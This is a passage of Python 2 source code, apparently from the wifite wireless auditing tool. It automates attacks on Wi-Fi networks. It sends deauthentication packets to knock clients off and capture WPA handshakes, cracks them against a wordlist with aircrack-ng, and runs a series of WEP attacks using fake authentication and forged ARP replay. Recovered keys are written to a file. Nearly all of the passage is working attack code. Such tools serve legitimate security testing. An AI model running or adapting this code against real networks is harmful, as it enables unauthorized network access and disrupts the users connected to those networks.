print GR+' [+]'+W+' '+G+'cowpatty'+W+' (strict):\t %s' % (G+'found!'+W if result else O+'not found'+W)
else: print R+' [!]'+O+' program not found: cowpatty'
if program_exists('tshark'):
result = has_handshake_tshark(t, capfile)
print GR+' [+]'+W+' '+G+'tshark'+W+':\t\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
else: print R+' [!]'+O+' program not found: tshark'
if program_exists('aircrack-ng'):
result = has_handshake_aircrack(t, capfile)
print GR+' [+]'+W+' '+G+'aircrack-ng'+W+':\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
else: print R+' [!]'+O+' program not found: aircrack-ng'
print ''
exit_gracefully(0)
def get_essid_from_cap(bssid, capfile):
"""
Attempts to get ESSID from cap file using BSSID as reference.
Returns '' if not found.
"""
if not program_exists('tshark'): return ''
cmd = ['tshark',
'-r', capfile,
'-R', 'wlan.fc.type_subtype == 0x05 && wlan.sa == %s' % bssid,
'-n']
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
for line in proc.communicate()[0].split('\n'):
if line.find('SSID=') != -1:
essid = line[line.find('SSID=')+5:]
print GR+' [+]'+W+' guessed essid: %s' % (G+essid+W)
return essid
print R+' [!]'+O+' unable to guess essid!'+W
return ''
def get_bssid_from_cap(essid, capfile):
"""
Returns first BSSID of access point found in cap file.
This is not accurate at all, but it's a good guess.
Returns '' if not found.
"""
global TARGET_ESSID
if not program_exists('tshark'): return ''
# Attempt to get BSSID based on ESSID
if essid != '':
cmd = ['tshark',
'-r', capfile,
'-R', 'wlan_mgt.ssid == "%s" && wlan.fc.type_subtype == 0x05' % (essid),
'-n', # Do not resolve MAC vendor names
'-T', 'fields', # Only display certain fields
'-e', 'wlan.sa'] # souce MAC address
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
bssid = proc.communicate()[0].split('\n')[0]
if bssid != '': return bssid
cmd = ['tshark',
'-r', capfile,
'-R', 'eapol',
'-n']
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
for line in proc.communicate()[0].split('\n'):
if line.endswith('Key (msg 1/4)') or line.endswith('Key (msg 3/4)'):
while line.startswith(' ') or line.startswith('\t'): line = line[1:]
line = line.replace('\t', ' ')
while line.find(' ') != -1: line = line.replace(' ', ' ')
return line.split(' ')[2]
elif line.endswith('Key (msg 2/4)') or line.endswith('Key (msg 4/4)'):
while line.startswith(' ') or line.startswith('\t'): line = line[1:]
line = line.replace('\t', ' ')
while line.find(' ') != -1: line = line.replace(' ', ' ')
return line.split(' ')[4]
return ''
def exit_gracefully(code=0):
"""
We may exit the program at any time.
We want to remove the temp folder and any files contained within it.
Removes the temp files/folder and exists with error code "code".
"""
# Remove temp files and folder
if os.path.exists(temp):
for file in os.listdir(temp):
os.remove(temp + file)
os.rmdir(temp)
# Disable monitor mode if enabled by us
disable_monitor_mode()
# Change MAC address back if spoofed
mac_change_back()
print GR+" [+]"+W+" quitting" # wifite will now exit"
print ''
# GTFO
exit(code)
def attack_interrupted_prompt():
"""
Promps user to decide if they want to exit,
skip to cracking WPA handshakes,
or continue attacking the remaining targets (if applicable).
returns True if user chose to exit complete, False otherwise
"""
global TARGETS_REMAINING
should_we_exit = False
# If there are more targets to attack, ask what to do next
if TARGETS_REMAINING > 0:
options = ''
print GR+"\n [+] %s%d%s target%s remain%s" % (G, TARGETS_REMAINING, W,
'' if TARGETS_REMAINING == 1 else 's',
's' if TARGETS_REMAINING == 1 else '')
print GR+" [+]"+W+" what do you want to do?"
options += G+'c'+W
print G+" [c]ontinue"+W+" attacking targets"
if len(WPA_CAPS_TO_CRACK) > 0:
options += W+', '+O+'s'+W
print O+" [s]kip"+W+" to cracking WPA cap files"
options += W+', or '+R+'e'+W
print R+" [e]xit"+W+" completely"
ri = ''
while ri != 'c' and ri != 's' and ri != 'e':
ri = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % options)
if ri == 's':
TARGETS_REMAINING = -1 # Tells start() to ignore other targets, skip to cracking
elif ri == 'e':
should_we_exit = True
return should_we_exit
#################
# WPA FUNCTIONS #
#################
def wpa_get_handshake(iface, target, clients):
"""
Opens an airodump capture on the target, dumping to a file.
During the capture, sends deauthentication packets to the target both as
general deauthentication packets and specific packets aimed at connected clients.
Waits until a handshake is captured.
"iface" - interface to capture on
"target" - Target object containing info on access point
"clients" - List of Client objects associated with the target
Returns True if handshake was found, False otherwise
"""
global TARGETS_REMAINING, WPA_ATTACK_TIMEOUT
if WPA_ATTACK_TIMEOUT <= 0: WPA_ATTACK_TIMEOUT = -1
# Generate the filename to save the .cap file as <SSID>_aa-bb-cc-dd-ee-ff.cap
save_as = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
+ '_' + target.bssid.replace(':', '-') + '.cap'
# Check if we already have a handshake for this SSID... If we do, generate a new filename
save_index = 0
while os.path.exists(save_as):
save_index += 1
save_as = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
+ '_' + target.bssid.replace(':', '-') \
+ '_' + str(save_index) + '.cap'
# Remove previous airodump output files (if needed)
remove_airodump_files(temp + 'wpa')
# Start of large Try-Except; used for catching keyboard interrupt (Ctrl+C)
try:
# Start airodump-ng process to capture handshakes
cmd = ['airodump-ng',
'-w', temp + 'wpa',
'-c', target.channel,
'--bssid', target.bssid, iface]
proc_read = Popen(cmd, stdout=DN, stderr=DN)
# Setting deauthentication process here to avoid errors later on
proc_deauth = None
print ' %s starting %swpa handshake capture%s on "%s"' % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT)+W, G, W, G+target.ssid+W)
got_handshake = False
seconds_running = 0
target_clients = clients[:]
client_index = -1
# Deauth and check-for-handshake loop
while not got_handshake and (WPA_ATTACK_TIMEOUT <= 0 or seconds_running < WPA_ATTACK_TIMEOUT):
time.sleep(1)
seconds_running += 1
print " \r",
print ' %s listening for handshake...\r' % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W),
stdout.flush()
if seconds_running % WPA_DEAUTH_TIMEOUT == 0:
# Send deauth packets via aireplay-ng
cmd = ['aireplay-ng',
'-0', # Attack method (Deauthentication)
'1', # Number of packets to send
'-a', target.bssid]
client_index += 1
if client_index == -1 or len(target_clients) == 0 or client_index >= len(target_clients):
print " %s sending 1 deauth to %s*broadcast*%s..." % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, G, W),
client_index = -1
else:
print " %s sending 1 deauth to %s... " % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, \
G+target_clients[client_index].bssid+W),
cmd.append('-h')
cmd.append(target_clients[client_index].bssid)
cmd.append(iface)
stdout.flush()
# Send deauth packets via aireplay, wait for them to complete.
proc_deauth = Popen(cmd, stdout=DN, stderr=DN)
proc_deauth.wait()
print "sent\r",
stdout.flush()
# Copy current dump file for consistency
if not os.path.exists(temp + 'wpa-01.cap'): continue
copy(temp + 'wpa-01.cap', temp + 'wpa-01.cap.temp')
# Save copy of cap file (for debugging)
#remove_file('/root/new/wpa-01.cap')
#copy(temp + 'wpa-01.cap', '/root/new/wpa-01.cap')
# Check for handshake
if has_handshake(target, temp + 'wpa-01.cap.temp'):
got_handshake = True
try: os.mkdir(WPA_HANDSHAKE_DIR + os.sep)
except OSError: pass
# Kill the airodump and aireplay processes
send_interrupt(proc_read)
send_interrupt(proc_deauth)
# Save a copy of the handshake
rename(temp + 'wpa-01.cap.temp', save_as)
print '\n %s %shandshake captured%s! saved as "%s"' % (GR+sec_to_hms(seconds_running)+W, G, W, G+save_as+W)
WPA_FINDINGS.append('%s (%s) handshake captured' % (target.ssid, target.bssid))
WPA_FINDINGS.append('saved as %s' % (save_as))
WPA_FINDINGS.append('')
# Strip handshake if needed
if WPA_STRIP_HANDSHAKE: strip_handshake(save_as)
# Add the filename and SSID to the list of 'to-crack'
# Cracking will be handled after all attacks are finished.
WPA_CAPS_TO_CRACK.append(CapFile(save_as, target.ssid, target.bssid))
break # Break out of while loop
# No handshake yet
os.remove(temp + 'wpa-01.cap.temp')
# Check the airodump output file for new clients
for client in parse_csv(temp + 'wpa-01.csv')[1]:
if client.station != target.bssid: continue
new_client = True
for c in target_clients:
if client.bssid == c.bssid:
new_client = False
break
if new_client:
print " %s %snew client%s found: %s " % \
(GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, G, W, \
G+client.bssid+W)
target_clients.append(client)
# End of Handshake wait loop.
if not got_handshake:
print R+' [0:00:00]'+O+' unable to capture handshake in time'+W
except KeyboardInterrupt:
print R+'\n (^C)'+O+' WPA handshake capture interrupted'+W
if attack_interrupted_prompt():
remove_airodump_files(temp + 'wpa')
send_interrupt(proc_read)
send_interrupt(proc_deauth)
print ''
exit_gracefully(0)
# clean up
remove_airodump_files(temp + 'wpa')
send_interrupt(proc_read)
send_interrupt(proc_deauth)
return got_handshake
def has_handshake_tshark(target, capfile):
"""
Uses TShark to check for a handshake.
Returns "True" if handshake is found, false otherwise.
"""
if program_exists('tshark'):
# Call Tshark to return list of EAPOL packets in cap file.
cmd = ['tshark',
'-r', capfile, # Input file
'-R', 'eapol', # Filter (only EAPOL packets)
'-n'] # Do not resolve names (MAC vendors)
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
lines = proc.communicate()[0].split('\n')
# Get list of all clients in cap file
clients = []
for line in lines:
if line.find('appears to have been cut short') != -1 or line.find('Running as user "root"') != -1 or line.strip() == '':
continue
while line.startswith(' '): line = line[1:]
while line.find(' ') != -1: line = line.replace(' ', ' ')
fields = line.split(' ')
src = fields[2].lower()
dst = fields[4].lower()
if src == target.bssid.lower() and clients.count(dst) == 0: clients.append(dst)
elif dst == target.bssid.lower() and clients.count(src) == 0: clients.append(src)
# Check each client for a handshake
for client in clients:
msg_num = 1 # Index of message in 4-way handshake (starts at 1)
for line in lines:
if line.find('appears to have been cut short') != -1: continue
if line.find('Running as user "root"') != -1: continue
if line.strip() == '': continue
# Sanitize tshark's output, separate into fields
while line[0] == ' ': line = line[1:]
while line.find(' ') != -1: line = line.replace(' ', ' ')
fields = line.split(' ')
# Sometimes tshark doesn't display the full header for "Key (msg 3/4)" on the 3rd handshake.
# This catches this glitch and fixes it.
if len(fields) < 8:
continue
elif len(fields) == 8:
fields.append('(msg')
fields.append('3/4)')
src = fields[2].lower() # Source MAC address
dst = fields[4].lower() # Destination MAC address
#msg = fields[9][0] # The message number (1, 2, 3, or 4)
msg = fields[-1][0]
# First, third msgs in 4-way handshake are from the target to client
if msg_num % 2 == 1 and (src != target.bssid.lower() or dst != client): continue
# Second, fourth msgs in 4-way handshake are from client to target
elif msg_num % 2 == 0 and (dst != target.bssid.lower() or src != client): continue
# The messages must appear in sequential order.
try:
if int(msg) != msg_num: continue
except ValueError: continue
msg_num += 1
# We need the first 4 messages of the 4-way handshake
# Although aircrack-ng cracks just fine with only 3 of the messages...
if msg_num >= 4:
return True
return False
def has_handshake_cowpatty(target, capfile, nonstrict=True):
"""
Uses cowpatty to check for a handshake.
Returns "True" if handshake is found, false otherwise.
"""
if not program_exists('cowpatty'): return False
# Call cowpatty to check if capfile contains a valid handshake.
cmd = ['cowpatty',
'-r', capfile, # input file
'-s', target.ssid, # SSID
'-c'] # Check for handshake
# Uses frames 1, 2, or 3 for key attack
if nonstrict: cmd.append('-2')
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
response = proc.communicate()[0]
if response.find('incomplete four-way handshake exchange') != -1:
return False
elif response.find('Unsupported or unrecognized pcap file.') != -1:
return False
elif response.find('Unable to open capture file: Success') != -1:
return False
return True
def has_handshake_pyrit(target, capfile):
"""
Uses pyrit to check for a handshake.
Returns "True" if handshake is found, false otherwise.
"""
if not program_exists('pyrit'): return False
# Call pyrit to "Analyze" the cap file's handshakes.
cmd = ['pyrit',
'-r', capfile,
'analyze']
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
hit_essid = False
for line in proc.communicate()[0].split('\n'):
# Iterate over every line of output by Pyrit
if line == '' or line == None: continue
if line.find("AccessPoint") != -1:
hit_essid = (line.find("('" + target.ssid + "')") != -1) and \
(line.lower().find(target.bssid.lower()) != -1)
#hit_essid = (line.lower().find(target.bssid.lower()))
else:
# If Pyrit says it's good or workable, it's a valid handshake.
if hit_essid and (line.find(', good, ') != -1 or \
line.find(', workable, ') != -1):
# or line.find(', bad, ') != -1):
return True
return False
def has_handshake_aircrack(target, capfile):
"""
Uses aircrack-ng to check for handshake.
Returns True if found, False otherwise.
"""
if not program_exists('aircrack-ng'): return False
crack = 'echo "" | aircrack-ng -a 2 -w - -b ' + target.bssid + ' ' + capfile
proc_crack = Popen(crack, stdout=PIPE, stderr=DN, shell=True)
proc_crack.wait()
txt = proc_crack.communicate()[0]
return (txt.find('Passphrase not in dictionary') != -1)
def has_handshake(target, capfile):
"""
Checks if .cap file contains a handshake.
Returns True if handshake is found, False otherwise.
"""
valid_handshake = True
tried = False
if WPA_HANDSHAKE_TSHARK:
tried = True
valid_handshake = has_handshake_tshark(target, capfile)
if valid_handshake and WPA_HANDSHAKE_COWPATTY:
tried = True
valid_handshake = has_handshake_cowpatty(target, capfile)
# Use CowPatty to check for handshake.
if valid_handshake and WPA_HANDSHAKE_COWPATTY:
tried = True
valid_handshake = has_handshake_cowpatty(target, capfile)
# Check for handshake using Pyrit if applicable
if valid_handshake and WPA_HANDSHAKE_PYRIT:
tried = True
valid_handshake = has_handshake_pyrit(target, capfile)
# Check for handshake using aircrack-ng
if valid_handshake and WPA_HANDSHAKE_AIRCRACK:
tried = True
valid_handshake = has_handshake_aircrack(target, capfile)
if tried: return valid_handshake
print R+' [!]'+O+' unable to check for handshake: all handshake options are disabled!'
exit_gracefully(1)
def strip_handshake(capfile):
"""
Uses Tshark or Pyrit to strip all non-handshake packets from a .cap file
File in location 'capfile' is overwritten!
"""
output_file = capfile
if program_exists('pyrit'):
cmd = ['pyrit',
'-r', capfile,
'-o', output_file,
'strip']
call(cmd,stdout=DN, stderr=DN)
elif program_exists('tshark'):
# strip results with tshark
cmd = ['tshark',
'-r', capfile, # input file
'-R', 'eapol || wlan_mgt.tag.interpretation', # filter
'-w', capfile + '.temp'] # output file
proc_strip = call(cmd, stdout=DN, stderr=DN)
rename(capfile + '.temp', output_file)
else:
print R+" [!]"+O+" unable to strip .cap file: neither pyrit nor tshark were found"+W
def save_cracked(bssid, ssid, key, encryption):
"""
Saves cracked access point key and info to a file.
"""
sep = chr(0)
fout = open('cracked.txt', 'a')
fout.write(bssid + sep + ssid + sep + key + sep + encryption + '\n')
fout.flush()
fout.close()
def load_cracked():
"""
Loads info about cracked access points into list, returns list.
"""
result = []
if not os.path.exists('cracked.txt'): return result
fin = open('cracked.txt', 'r')
lines = fin.read().split('\n')
fin.close()
for line in lines:
fields = line.split(chr(0))
if len(fields) <= 3: continue
tar = Target(fields[0], '', '', '', fields[3], fields[1])
tar.key = fields[2]
result.append(tar)
return result
##########################
# WPA CRACKING FUNCTIONS #
##########################
def wpa_crack(capfile):
"""
Cracks cap file using aircrack-ng
This is crude and slow. If people want to crack using pyrit or cowpatty or oclhashcat,
they can do so manually.
"""
if WPA_DICTIONARY == '':
print R+' [!]'+O+' no WPA dictionary found! use -dict <file> command-line argument'+W
return False
print GR+' [0:00:00]'+W+' cracking %s with %s' % (G+capfile.ssid+W, G+'aircrack-ng'+W)
start_time = time.time()
cracked = False
remove_file(temp + 'out.out')
remove_file(temp + 'wpakey.txt')
cmd = ['aircrack-ng',
'-a', '2', # WPA crack
'-w', WPA_DICTIONARY, # Wordlist
'-l', temp + 'wpakey.txt', # Save key to file
'-b', capfile.bssid, # BSSID of target
capfile.filename]
proc = Popen(cmd, stdout=open(temp + 'out.out', 'a'), stderr=DN)
try:
kt = 0 # Keys tested
kps = 0 # Keys per second
while True:
time.sleep(1)
if proc.poll() != None: # aircrack stopped
if os.path.exists(temp + 'wpakey.txt'):
# Cracked
inf = open(temp + 'wpakey.txt')
key = inf.read().strip()
inf.close()
WPA_FINDINGS.append('cracked wpa key for "%s" (%s): "%s"' % (G+capfile.ssid+W, G+capfile.bssid+W, C+key+W))
WPA_FINDINGS.append('')
save_cracked(capfile.bssid, capfile.ssid, key, 'WPA')
print GR+'\n [+]'+W+' cracked %s (%s)!' % (G+capfile.ssid+W, G+capfile.bssid+W)
print GR+' [+]'+W+' key: "%s"\n' % (C+key+W)
cracked = True
else:
# Did not crack
print R+'\n [!]'+R+'crack attempt failed'+O+': passphrase not in dictionary'+W
break
inf = open(temp + 'out.out', 'r')
lines = inf.read().split('\n')
inf.close()
outf = open(temp + 'out.out', 'w')
outf.close()
for line in lines:
i = line.find(']')
j = line.find('keys tested', i)
if i != -1 and j != -1:
kts = line[i+2:j-1]
try: kt = int(kts)
except ValueError: pass
i = line.find('(')
j = line.find('k/s)', i)
if i != -1 and j != -1:
kpss = line[i+1:j-1]
try: kps = float(kpss)
except ValueError: pass
print "\r %s %s keys tested (%s%.2f keys/sec%s) " % \
(GR+sec_to_hms(time.time() - start_time)+W, G+add_commas(kt)+W, G, kps, W),
stdout.flush()
except KeyboardInterrupt: print R+'\n (^C)'+O+' WPA cracking interrupted'+W
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
return cracked
def add_commas(n):
"""
Receives integer n, returns string representation of n with commas in thousands place.
I'm sure there's easier ways of doing this... but meh.
"""
strn = str(n)
lenn = len(strn)
i = 0
result = ''
while i < lenn:
if (lenn - i) % 3 == 0 and i != 0: result += ','
result += strn[i]
i += 1
return result
#################
# WEP FUNCTIONS #
#################
def attack_wep(iface, target, clients):
"""
Attacks WEP-encrypted network.
Returns True if key was successfully found, False otherwise.
"""
global WEP_TIMEOUT, TARGETS_REMAINING
if WEP_TIMEOUT <= 0: WEP_TIMEOUT = -1
total_attacks = 6 # 4 + (2 if len(clients) > 0 else 0)
if not WEP_ARP_REPLAY: total_attacks -= 1
if not WEP_CHOPCHOP: total_attacks -= 1
if not WEP_FRAGMENT: total_attacks -= 1
if not WEP_CAFFELATTE: total_attacks -= 1
if not WEP_P0841: total_attacks -= 1
if not WEP_HIRTE: total_attacks -= 1
if total_attacks <= 0:
print R+' [!]'+O+' unable to initiate WEP attacks: no attacks are selected!'
return False
remaining_attacks = total_attacks
print ' %s preparing attack "%s" (%s)' % \
(GR+sec_to_hms(WEP_TIMEOUT)+W, G+target.ssid+W, G+target.bssid+W)
interrupted_count = 0
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
# Start airodump process to capture packets
cmd_airodump = ['airodump-ng',
'-w', temp + 'wep', # Output file name (wep-01.cap, wep-01.csv)
'-c', target.channel, # Wireless channel
'--bssid', target.bssid,
iface]
proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN)
proc_aireplay = None
proc_aircrack = None
successful = False # Flag for when attack is successful
started_cracking = False # Flag for when we have started aircrack-ng
client_mac = '' # The client mac we will send packets to/from
total_ivs = 0
ivs = 0
last_ivs = 0
for attack_num in xrange(0, 6):
# Skip disabled attacks
if attack_num == 0 and not WEP_ARP_REPLAY: continue
elif attack_num == 1 and not WEP_CHOPCHOP: continue
elif attack_num == 2 and not WEP_FRAGMENT: continue
elif attack_num == 3 and not WEP_CAFFELATTE: continue
elif attack_num == 4 and not WEP_P0841: continue
elif attack_num == 5 and not WEP_HIRTE: continue
remaining_attacks -= 1
try:
if wep_fake_auth(iface, target, sec_to_hms(WEP_TIMEOUT)):
# Successful fake auth
client_mac = THIS_MAC
elif not WEP_IGNORE_FAKEAUTH:
send_interrupt(proc_aireplay)
send_interrupt(proc_airodump)
print R+' [!]'+O+' unable to fake-authenticate with target'
print R+' [!]'+O+' to skip this speed bump, select "ignore-fake-auth" at command-line'
return False
remove_file(temp + 'arp.cap')
# Generate the aireplay-ng arguments based on attack_num and other params
cmd = get_aireplay_command(iface, attack_num, target, clients, client_mac)
if cmd == '': continue
proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
print '\r %s attacking "%s" via' % (GR+sec_to_hms(WEP_TIMEOUT)+W, G+target.ssid+W),
if attack_num == 0: print G+'arp-replay',
elif attack_num == 1: print G+'chop-chop',
elif attack_num == 2: print G+'fragmentation',
elif attack_num == 3: print G+'caffe-latte',
elif attack_num == 4: print G+'p0841',
elif attack_num == 5: print G+'hirte',
print 'attack'+W
print ' %s captured %s%d%s ivs @ %s iv/sec' % (GR+sec_to_hms(WEP_TIMEOUT)+W, G, total_ivs, W, G+'0'+W),
stdout.flush()
time.sleep(1)
if attack_num == 1:
# Send a deauth packet to broadcast and all clients *just because!*
wep_send_deauths(iface, target, clients)
last_deauth = time.time()
replaying = False
time_started = time.time()
while time.time() - time_started < WEP_TIMEOUT:
# time.sleep(5)
for time_count in xrange(0, 6):
if WEP_TIMEOUT == -1:
current_hms = "[endless]"
else:
current_hms = sec_to_hms(WEP_TIMEOUT - (time.time() - time_started))
print "\r %s\r" % (GR+current_hms+W),
stdout.flush()
time.sleep(1)
# Calculates total seconds remaining
# Check number of IVs captured
csv = parse_csv(temp + 'wep-01.csv')[0]
if len(csv) > 0:
ivs = int(csv[0].data)
print "\r ",
print "\r %s captured %s%d%s ivs @ %s%d%s iv/sec" % \
(GR+current_hms+W, G, total_ivs + ivs, W, G, (ivs - last_ivs) / 5, W),
if ivs - last_ivs == 0 and time.time() - last_deauth > 30:
print "\r %s deauthing to generate packets..." % (GR+current_hms+W),
wep_send_deauths(iface, target, clients)
print "done\r",
last_deauth = time.time()
last_ivs = ivs
stdout.flush()
if total_ivs + ivs >= WEP_CRACK_AT_IVS and not started_cracking:
# Start cracking
cmd = ['aircrack-ng',
'-a', '1',
'-l', temp + 'wepkey.txt']
#temp + 'wep-01.cap']
# Append all .cap files in temp directory (in case we are resuming)
for file in os.listdir(temp):
if file.startswith('wep-') and file.endswith('.cap'):
cmd.append(temp + file)
print "\r %s started %s (%sover %d ivs%s)" % (GR+current_hms+W, G+'cracking'+W, G, WEP_CRACK_AT_IVS, W)
proc_aircrack = Popen(cmd, stdout=DN, stderr=DN)
started_cracking = True
# Check if key has been cracked yet.
if os.path.exists(temp + 'wepkey.txt'):
# Cracked!
infile = open(temp + 'wepkey.txt', 'r')
key = infile.read().replace('\n', '')
infile.close()
print '\n\n %s %s %s (%s)! key: "%s"' % (current_hms, G+'cracked', target.ssid+W, G+target.bssid+W, C+key+W)
WEP_FINDINGS.append('cracked %s (%s), key: "%s"' % (target.ssid, target.bssid, key))
WEP_FINDINGS.append('')
save_cracked(target.bssid, target.ssid, key, 'WEP')
# Kill processes
send_interrupt(proc_airodump)
send_interrupt(proc_aireplay)
try: os.kill(proc_aireplay, SIGTERM)
except: pass
send_interrupt(proc_aircrack)
# Remove files generated by airodump/aireplay/packetforce
time.sleep(0.5)
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
return True
# Check if aireplay is still executing
if proc_aireplay.poll() == None:
if replaying: print ', '+G+'replaying \r'+W,
elif attack_num == 1 or attack_num == 2: print ', waiting for packet \r',
stdout.flush()
continue
# At this point, aireplay has stopped
if attack_num != 1 and attack_num != 2:
print '\r %s attack failed: %saireplay-ng exited unexpectedly%s' % (R+current_hms, O, W)
break # Break out of attack's While loop
# Check for a .XOR file (we expect one when doing chopchop/fragmentation
xor_file = ''
for filename in sorted(os.listdir(temp)):
if filename.lower().endswith('.xor'): xor_file = temp + filename
if xor_file == '':
print '\r %s attack failed: %sunable to generate keystream %s' % (R+current_hms, O, W)
break
remove_file(temp + 'arp.cap')
cmd = ['packetforge-ng',
'-0',
'-a', targets.bssid,
'-h', client_mac,
'-k', '192.168.1.2',
'-l', '192.168.1.100',
'-y', xor_file,
'-w', temp + 'arp.cap',
iface]
proc_pforge = Popen(cmd, stdout=PIPE, stderr=DN)
proc_pforge.wait()
forged_packet = proc_pforge.communicate()[0]
remove_file(xor_file)
if forged_packet == None: result = ''
forged_packet = forged_packet.strip()
if not forged_packet.find('Wrote packet'):
print "\r %s attack failed: unable to forget ARP packet %s" % (R+current_hms+O, w)
break
# We were able to forge a packet, so let's replay it via aireplay-ng
cmd = ['aireplay-ng',
'--arpreplay',
'-b', target.bssid,
'-r', temp + 'arp.cap', # Used the forged ARP packet
'-F', # Select the first packet
iface]
proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
print '\r %s forged %s! %s... ' % (GR+current_hms+W, G+'arp packet'+W, G+'replaying'+W)
replaying = True
# After the attacks, if we are already cracking, wait for the key to be found!
while started_cracking: # ivs > WEP_CRACK_AT_IVS:
time.sleep(5)
# Check number of IVs captured
csv = parse_csv(temp + 'wep-01.csv')[0]
if len(csv) > 0:
ivs = int(csv[0].data)
print GR+" [endless]"+W+" captured %s%d%s ivs, iv/sec: %s%d%s \r" % \
(G, total_ivs + ivs, W, G, (ivs - last_ivs) / 5, W),
last_ivs = ivs
stdout.flush()
# Check if key has been cracked yet.
if os.path.exists(temp + 'wepkey.txt'):
# Cracked!
infile = open(temp + 'wepkey.txt', 'r')
key = infile.read().replace('\n', '')
infile.close()
print GR+'\n\n [endless] %s %s (%s)! key: "%s"' % (G+'cracked', target.ssid+W, G+target.bssid+W, C+key+W)
WEP_FINDINGS.append('cracked %s (%s), key: "%s"' % (target.ssid, target.bssid, key))
WEP_FINDINGS.append('')
save_cracked(target.bssid, target.ssid, key, 'WEP')
# Kill processes
send_interrupt(proc_airodump)
send_interrupt(proc_aireplay)
send_interrupt(proc_aircrack)
# Remove files generated by airodump/aireplay/packetforce
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
return True
# Keyboard interrupt during attack
except KeyboardInterrupt:
print R+'\n (^C)'+O+' WEP attack interrupted\n'+W
send_interrupt(proc_airodump)
if proc_aireplay != None:
send_interrupt(proc_aireplay)
if proc_aircrack != None:
send_interrupt(proc_aircrack)
options = []
selections = []
if remaining_attacks > 0:
options.append('%scontinue%s attacking this target (%d remaining WEP attack%s)' % \
(G, W, (remaining_attacks), 's' if remaining_attacks != 1 else ''))
selections.append(G+'c'+W)
if TARGETS_REMAINING > 0:
options.append('%sskip%s this target, move onto next target (%d remaining target%s)' % \
(O, W, TARGETS_REMAINING, 's' if TARGETS_REMAINING != 1 else ''))
selections.append(O+'s'+W)
options.append('%sexit%s the program completely' % (R, W))
selections.append(R+'e'+W)
if len(options) > 1:
# Ask user what they want to do, Store answer in "response"
print GR+' [+]'+W+' what do you want to do?'
response = ''
while response != 'c' and response != 's' and response != 'e':
for option in options:
print ' %s' % option
response = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % (', '.join(selections))).lower()[0]
else:
response = 'e'
if response == 'e' or response == 's':
# Exit or skip target (either way, stop this attack)
if WEP_SAVE:
# Save packets
save_as = re.sub(r'[^a-zA-Z0-9]', '', target.ssid) + '_' + target.bssid.replace(':', '-') + '.cap'+W
try: rename(temp + 'wep-01.cap', save_as)
except OSError: print R+' [!]'+O+' unable to save capture file!'+W
else: print GR+' [+]'+W+' packet capture '+G+'saved'+W+' to '+G+save_as+W
# Remove files generated by airodump/aireplay/packetforce
for filename in os.listdir('.'):
if filename.startswith('replay_arp-') and filename.endswith('.cap'):
remove_file(filename)
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
print ''
if response == 'e':
exit_gracefully(0)
return
elif response == 'c':
# Continue attacks
# Need to backup temp/wep-01.cap and remove airodump files
i = 2
while os.path.exists(temp + 'wep-' + str(i) + '.cap'):
i += 1
copy(temp + "wep-01.cap", temp + 'wep-' + str(i) + '.cap')
remove_airodump_files(temp + 'wep')
# Need to restart airodump-ng, as it's been interrupted/killed
proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN)
# Say we haven't started cracking yet, so we re-start if needed.
started_cracking = False
# Reset IVs counters for proper behavior
total_ivs += ivs
ivs = 0
last_ivs = 0
# Also need to remember to crack "temp/*.cap" instead of just wep-01.cap
pass
if successful:
print GR+'\n [0:00:00]'+W+' attack complete: '+G+'success!'+W
else:
print GR+'\n [0:00:00]'+W+' attack complete: '+R+'failure'+W
send_interrupt(proc_airodump)
if proc_aireplay != None:
send_interrupt(proc_aireplay)
# Remove files generated by airodump/aireplay/packetforce
for filename in os.listdir('.'):
if filename.startswith('replay_arp-') and filename.endswith('.cap'):
remove_file(filename)
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
def wep_fake_auth(iface, target, time_to_display):
"""
Attempt to (falsely) authenticate with a WEP access point.
Gives 3 seconds to make each 5 authentication attempts.
Returns True if authentication was successful, False otherwise.
"""
max_wait = 3 # Time, in seconds, to allow each fake authentication
max_attempts = 5 # Number of attempts to make
for fa_index in xrange(1, max_attempts + 1):
print '\r ',
print '\r %s attempting %sfake authentication%s (%d/%d)... ' % \
(GR+time_to_display+W, G, W, fa_index, max_attempts),
stdout.flush()
cmd = ['aireplay-ng',
'-1', '0', # Fake auth, no delay
'-a', target.bssid,
'-T', '1'] # Make 1 attempt
if target.ssid != '':
cmd.append('-e')
cmd.append(target.ssid)
cmd.append(iface)
proc_fakeauth = Popen(cmd, stdout=PIPE, stderr=DN)
started = time.time()
while proc_fakeauth.poll() == None and time.time() - started <= max_wait: pass
if time.time() - started > max_wait:
send_interrupt(proc_fakeauth)
print R+'failed'+W,
stdout.flush()
time.sleep(0.5)
continue
result = proc_fakeauth.communicate()[0].lower()
if result.find('switching to shared key') != -1 or \
result.find('rejects open system'): pass
# TODO Shared Key Authentication (SKA)
if result.find('association successful') != -1:
print G+'success!'+W
return True
print R+'failed'+W,
stdout.flush()
time.sleep(0.5)
continue
print ''
return False
def get_aireplay_command(iface, attack_num, target, clients, client_mac):
"""
Returns aireplay-ng command line arguments based on parameters.
